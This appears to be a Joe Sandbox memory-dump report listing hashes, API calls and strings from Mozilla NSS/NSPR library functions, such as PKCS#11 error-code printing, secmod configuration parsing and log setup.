Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 1f60456d3e3f1bbc8342706b89c7ae9520c2731851487ba12e3c3bedb71baf9e
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: A3D14632B056968BDB158E18C8843DE7F63AB85328F5D4329DC641B7C6C37AE909C7D2

Function 6CA98EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa47d381555b0e1847b6e6f371146a775a4bd138f42624cb62ddfc1cfd66434c
Instruction ID: 3c8b5b356199c0ef1d84f03316e88d4041b64241c46d226a1c7a852319ff4797
Opcode Fuzzy Hash: fa47d381555b0e1847b6e6f371146a775a4bd138f42624cb62ddfc1cfd66434c
Instruction Fuzzy Hash: 29118C32A152198BD708DF25D886B5AB7F5BF4231CF08426AD8168FA42C775E8C6C7C1

Function 6CB70C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808bf465746036826954279b2a386d13c786ecd739d3651db5f3ea97a6fb8790
Instruction ID: 66c0e113c740d81c345f445cbb1b2504c388428df58c13eb16a0493a4333f45a
Opcode Fuzzy Hash: 808bf465746036826954279b2a386d13c786ecd739d3651db5f3ea97a6fb8790
Instruction Fuzzy Hash: B811E3747043859FCB10DF28D88066A7BB5FF85368F14806EDC298B701DB32E906CBA1

Function 6CAE3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 77ade886c35ed5ca25f9f746125bae9512ae49c26b0d5176e0b2c2a0c0edfdd2
Instruction ID: 4363c41cac0ac321326b02075db5174eeadb2ef649281ad64511d9b63d654c46
Opcode Fuzzy Hash: 77ade886c35ed5ca25f9f746125bae9512ae49c26b0d5176e0b2c2a0c0edfdd2
Instruction Fuzzy Hash: 81F05E70E047598BCB10DF29C55159EB7F4EF1E254F109619EC8AAB701EB70AAC4C7C1

Function 6CB70D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: d2ce63400f60833b4a2763798bb895a37f0e51521096b5ff1db3c3b0a8d5a5cb
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: A0E09B392112B467DB248E09D5506A97359DF81615FB5807FCC6D9FA01D733F80387A1

Function 6CA9CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495d2442ebac63b7aff58f810417a2ea83deb6316cf7e368d5abe34cbafbd7b2
Instruction ID: 7b9e256de708f65f1093f643eb8e642460c0a40fb05346860a479d2e778afab4
Opcode Fuzzy Hash: 495d2442ebac63b7aff58f810417a2ea83deb6316cf7e368d5abe34cbafbd7b2
Instruction Fuzzy Hash: AFC04838244608CFC704DA08E489AA53BB8AB09611B050098EA028B721DB22F800CA80

Function 6CAD1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CAD1D46), ref: 6CAD2345

Strings

CKR_DOMAIN_PARAMS_INVALID, xrefs: 6CAD2015
CKR_MUTEX_BAD, xrefs: 6CAD1F49
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6CAD218D
CKR_TEMPLATE_INCONSISTENT, xrefs: 6CAD1EE1
CKR_RANDOM_NO_RNG, xrefs: 6CAD22A7
CKR_TOKEN_NOT_PRESENT, xrefs: 6CAD1F81
CKR_DEVICE_ERROR, xrefs: 6CAD229D
rv = 0x%x, xrefs: 6CAD2312
CKR_MUTEX_NOT_LOCKED, xrefs: 6CAD2225
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6CAD1F8B
CKR_DEVICE_REMOVED, xrefs: 6CAD2261
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6CAD22FF
CKR_DEVICE_MEMORY, xrefs: 6CAD1FF3
CKR_NEW_PIN_MODE, xrefs: 6CAD1E9F
CKR_INFORMATION_SENSITIVE, xrefs: 6CAD22B1
CKR_FUNCTION_CANCELED, xrefs: 6CAD1E73
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6CAD2293, 6CAD233F
CKR_PIN_LOCKED, xrefs: 6CAD2075
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6CAD227F
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6CAD2320
CKR_PIN_EXPIRED, xrefs: 6CAD206B
CKR_OPERATION_CANCEL_FAILED, xrefs: 6CAD1F77
CKR_SIGNATURE_LEN_RANGE, xrefs: 6CAD20D9
CKR_PIN_INVALID, xrefs: 6CAD2057
CKR_PIN_LEN_RANGE, xrefs: 6CAD2061
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6CAD1F0F
CKR_CURVE_NOT_SUPPORTED, xrefs: 6CAD2179
CKR_STATE_UNSAVEABLE, xrefs: 6CAD2037
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6CAD1DE0
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6CAD1FD7
CKR_TEMPLATE_INCOMPLETE, xrefs: 6CAD1F95
CKR_SIGNATURE_INVALID, xrefs: 6CAD20CF
CKR_SAVED_STATE_INVALID, xrefs: 6CAD1E56
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6CAD226B
CKR_NEXT_OTP, xrefs: 6CAD222F
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6CAD2327
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6CAD2319
CKR_OPERATION_ACTIVE, xrefs: 6CAD22B8
CKR_FUNCTION_REJECTED, xrefs: 6CAD2289
CKR_WRAPPED_KEY_INVALID, xrefs: 6CAD1FB5
CKR_OK, xrefs: 6CAD1DFC
CKR_OBJECT_HANDLE_INVALID, xrefs: 6CAD204D
rv = %s, xrefs: 6CAD2340
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6CAD232E
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6CAD2275
CKR_BUFFER_TOO_SMALL, xrefs: 6CAD2183
CKR_PIN_INCORRECT, xrefs: 6CAD1D92

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 776924523f385b79cb3627ca3a3b0e7205df6755d0d9b1b6ec6c02ddf2434785
Instruction ID: 69c8285746bfe9c84bf4000f13c68c487f461f2dccfa90040244abd6de5300d6
Opcode Fuzzy Hash: 776924523f385b79cb3627ca3a3b0e7205df6755d0d9b1b6ec6c02ddf2434785
Instruction Fuzzy Hash: 1F610F3064D084C6E62C0C4C81AE3BC2130A70A755F6B933BE2828EE61D795FED6C697

Function 6CB05DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CB05E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB05E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CB05E5C
free.MOZGLUE(00000000), ref: 6CB05E7E
free.MOZGLUE(00000000), ref: 6CB05E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6CB05EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CB05EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB05ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CB05EF0
free.MOZGLUE(00000000), ref: 6CB05F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB05F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CB05F5B
free.MOZGLUE(00000000), ref: 6CB05F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CB05FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CB05FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CB05FC4
free.MOZGLUE(00000000), ref: 6CB05FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB05FE9
free.MOZGLUE(00000000), ref: 6CB05FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB0600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB06027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CB0605A
PR_smprintf.NSS3(6CBDAAF9,00000000), ref: 6CB0606A
free.MOZGLUE(00000000), ref: 6CB0607C
free.MOZGLUE(00000000), ref: 6CB0609A
free.MOZGLUE(00000000), ref: 6CB060B2
free.MOZGLUE(?), ref: 6CB060CE

Strings

secmod=, xrefs: 6CB05FB1
%s/%s, xrefs: 6CB06055
readOnly, xrefs: 6CB05E56
configDir=, xrefs: 6CB05F9D
flags, xrefs: 6CB05E3A, 6CB05EC6, 6CB05F30
pkcs11.txt, xrefs: 6CB05F47, 6CB05F7C, 6CB0603A, 6CB06053
noModDB, xrefs: 6CB05EEA
secmod.db, xrefs: 6CB05EA0
forceSecmodChoice, xrefs: 6CB05F55

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 56c012520e5a945040bd54b80e500e94f5d998d230cca21df4cbad160d232ac7
Instruction ID: bc450804c9e43df94815f5dc4a7162bb05592bbf083b88b5de065d6a1d4652b6
Opcode Fuzzy Hash: 56c012520e5a945040bd54b80e500e94f5d998d230cca21df4cbad160d232ac7
Instruction Fuzzy Hash: 8591C3F4B042C55BEF118B249C85BAA3FA8DF0534CF080060EC559BF42E725E999C7AA

Function 6CAD28A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6CAD28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6CAD28EF

Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CBB0B88
Part of subcall function 6CBB09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CBB0C5D
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CBB0C8D
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0C9C
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CBB0CD1
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CBB0CEC
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0CFB
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0D16
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CBB0D26
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0D35
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CBB0D65
Part of subcall function 6CBB09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CBB0D70
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0D90
Part of subcall function 6CBB09D0: free.MOZGLUE(00000000), ref: 6CBB0D99

Part of subcall function 6CA90F00: PR_GetPageSize.NSS3(6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F1B
Part of subcall function 6CA90F00: PR_NewLogModule.NSS3(clock,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAD28D6

Part of subcall function 6CBB09D0: PR_Now.NSS3 ref: 6CBB0A22
Part of subcall function 6CBB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBB0A35
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBB0A66
Part of subcall function 6CBB09D0: PR_GetCurrentThread.NSS3 ref: 6CBB0A70
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBB0A9D
Part of subcall function 6CBB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBB0AC8
Part of subcall function 6CBB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBB0AE8
Part of subcall function 6CBB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBB0B19
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0B48
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0C76
Part of subcall function 6CBB09D0: PR_LogFlush.NSS3 ref: 6CBB0C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6CAD2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6CAD2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6CAD29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6CAD29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6CAD2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6CAD2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6CAD2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6CAD2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6CAD2AB6

Strings

firmware version: %d.%d, xrefs: 6CAD2AB1
C_GetTokenInfo, xrefs: 6CAD28B8
CKF_LOGIN_REQUIRED, xrefs: 6CAD29F3, 6CAD2A1E
CKF_RNG, xrefs: 6CAD2A13, 6CAD2A20
flags = %s %s %s %s, xrefs: 6CAD2A21
label = "%.32s", xrefs: 6CAD295E
hardware version: %d.%d, xrefs: 6CAD2A89
manufacturerID = "%.32s", xrefs: 6CAD297E
serial = "%.16s", xrefs: 6CAD29BE
maxRwSessions = %u, RwSessions = %u, xrefs: 6CAD2A61
CKF_USER_PIN_INIT, xrefs: 6CAD29E5
slotID = 0x%x, xrefs: 6CAD28D1
CKF_WRITE_PROTECTED, xrefs: 6CAD29FE, 6CAD2A1F
maxSessions = %u, Sessions = %u, xrefs: 6CAD2A43
model = "%.16s", xrefs: 6CAD299E
pInfo = 0x%p, xrefs: 6CAD28EA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: 4220dc7b8963e9b7ad296d47dcf65573bf1a21d1e9ac634f983483486b025bf0
Instruction ID: c0aad45b8d63911dcc772bd819e5c0b847d8b65e2ac2ae8cb9641d47bf8623f2
Opcode Fuzzy Hash: 4220dc7b8963e9b7ad296d47dcf65573bf1a21d1e9ac634f983483486b025bf0
Instruction Fuzzy Hash: FA51F8B57001859FEB008F54DE9DA7937B5EB4121DF4B81B8E854AB612DB32EC48CB62

Function 6CA91D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6CA91DA3

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CA91DB2

Part of subcall function 6CA91240: TlsGetValue.KERNEL32(00000040,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91267
Part of subcall function 6CA91240: EnterCriticalSection.KERNEL32(?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA9127C
Part of subcall function 6CA91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91291
Part of subcall function 6CA91240: PR_Unlock.NSS3(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA912A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA91DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CA91E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CA91EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CA91ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CA91EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CA91F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA91F34
PR_SetLogBuffering.NSS3(00004000), ref: 6CA91F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CA91F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA91F83
PR_SetLogFile.NSS3(00000000), ref: 6CA91FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CA91FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6CA91FCB
free.MOZGLUE(00000000), ref: 6CA91FD2

Strings

timestamp, xrefs: 6CA91EC4
NSPR_LOG_MODULES, xrefs: 6CA91DAD
Unable to create nspr log file '%s', xrefs: 6CA91FB3
bufsize, xrefs: 6CA91E9B
sync, xrefs: 6CA91E46
all, xrefs: 6CA91F0E
append, xrefs: 6CA91EE6
NSPR_LOG_FILE, xrefs: 6CA91F69
, %n, xrefs: 6CA91E6B
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6CA91E27

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
